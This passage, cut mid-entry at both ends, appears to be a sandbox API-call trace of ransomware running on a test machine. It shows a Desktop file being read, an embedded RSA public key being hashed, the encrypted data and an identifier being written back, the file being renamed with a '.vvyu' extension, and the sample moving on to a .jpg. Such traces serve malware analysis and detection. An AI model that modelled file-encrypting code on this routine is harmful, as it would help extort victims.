out: hHeap=0x620000) returned 1 [0192.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0192.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0192.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0192.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0192.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0192.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936f0 | out: hHeap=0x620000) returned 1 [0192.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c936f0 [0192.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0192.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2e9ea68 [0192.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93750 | out: hHeap=0x620000) returned 1 [0192.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0192.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93780 | out: hHeap=0x620000) returned 1 [0192.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2e9ec78 [0192.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0192.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0192.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0192.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936f0 | out: hHeap=0x620000) returned 1 [0192.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2e9ee90 [0192.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0192.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0192.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0192.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0192.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0192.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0192.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0192.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ec78 | out: hHeap=0x620000) returned 1 [0192.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ee90 | out: hHeap=0x620000) returned 1 [0192.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0192.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0192.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93720 | out: hHeap=0x620000) returned 1 [0192.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93768 | out: hHeap=0x620000) returned 1 [0192.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0192.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93708 | out: hHeap=0x620000) returned 1 [0192.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936d8 | out: hHeap=0x620000) returned 1 [0192.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0192.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0192.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0192.921] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936c0 | out: hHeap=0x620000) returned 1 [0192.921] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95578 | out: hHeap=0x620000) returned 1 [0192.921] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ea68 | out: hHeap=0x620000) returned 1 [0192.921] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0192.922] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0192.922] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0192.922] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0192.922] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0192.922] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0192.922] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0192.923] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.923] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.923] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0192.923] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0xfd32, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0xfd32, lpOverlapped=0x0) returned 1 [0192.924] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0192.924] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xfd37, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.924] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0192.924] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0192.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0192.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2e9ea68 [0192.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2e9ea68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.925] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2e9ee98 [0192.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ea68 | out: hHeap=0x620000) returned 1 [0192.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0192.925] WriteFile (in: hFile=0x568, lpBuffer=0x2e9ee98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e9ee98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0192.925] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ee98 | out: hHeap=0x620000) returned 1 [0192.926] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.926] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0192.926] CloseHandle (hObject=0x568) returned 1 [0192.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0192.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2e9ea68 [0192.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0192.928] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\RDY1PliN5xV7.mp4" (normalized: "c:\\users\\keecfmwgj\\desktop\\rdy1plin5xv7.mp4"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\RDY1PliN5xV7.mp4.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\rdy1plin5xv7.mp4.vvyu")) returned 1 [0192.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ea68 | out: hHeap=0x620000) returned 1 [0192.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.930] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0192.933] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5bbc0930, ftCreationTime.dwHighDateTime=0x1d89db9, ftLastAccessTime.dwLowDateTime=0x7c1e2b30, ftLastAccessTime.dwHighDateTime=0x1d8a4fe, ftLastWriteTime.dwLowDateTime=0x7c1e2b30, ftLastWriteTime.dwHighDateTime=0x1d8a4fe, nFileSizeHigh=0x0, nFileSizeLow=0x18aa5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RwqiCW2QitXLv4.jpg", cAlternateFileName="RWQICW~1.JPG")) returned 1 [0192.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95578 [0192.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4658 [0192.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95578 | out: hHeap=0x620000) returned 1 [0192.933] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\RwqiCW2QitXLv4.jpg") returned=".jpg" [0192.933] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\RwqiCW2QitXLv4.jpg" (normalized: "c:\\users\\keecfmwgj\\desktop\\rwqicw2qitxlv4.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0192.934] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=101029) returned 1 [0192.934] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0192.936] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x18a7f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.936] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0192.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.938] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.938] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x18aa5, lpOverlapped=0x0) returned 1 [0192.939] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0192.939] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.939] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.939] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0192.940] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0192.940] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.940] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0192.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0192.941] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0192.941] GetLastError () returned 0x0 [0192.941] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0192.941] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0192.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.941] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0192.941] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0192.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.941] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0192.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18ab0) returned 0x2ea79b0 [0192.942] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0192.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0192.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0192.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95578 [0192.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c936c0 [0192.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e955c0 [0192.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c936d8 [0192.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93708 [0192.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93768 [0192.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93720 [0192.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0192.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0192.943] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0192.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea0a68 [0192.943] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93708 | out: hHeap=0x620000) returned 1 [0192.943] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93720 | out: hHeap=0x620000) returned 1 [0192.943] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93768 | out: hHeap=0x620000) returned 1 [0192.943] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0192.944] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0192.944] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93768 [0192.944] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0192.944] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93720 [0192.944] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0192.944] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2c93708 [0192.944] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0192.944] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0192.944] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0192.944] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0192.944] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0192.944] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0192.944] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0192.944] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0192.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0192.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93720 | out: hHeap=0x620000) returned 1 [0192.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93708 | out: hHeap=0x620000) returned 1 [0192.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0192.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0192.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93768 | out: hHeap=0x620000) returned 1 [0192.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0192.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0192.946] GetCurrentThreadId () returned 0x66c [0192.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0192.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2e9ea80 [0192.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0192.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0192.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0192.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0192.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0192.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0192.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.947] GetCurrentThreadId () returned 0x66c [0192.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0192.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0192.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0192.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0192.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa28 [0192.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0192.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0192.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0192.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93768 [0192.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0192.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0192.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0192.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0192.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0192.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0192.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0192.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93708 [0192.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0192.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0192.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0192.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0192.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0192.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0192.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93720 [0192.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0192.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0192.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0192.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c936f0 [0192.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: 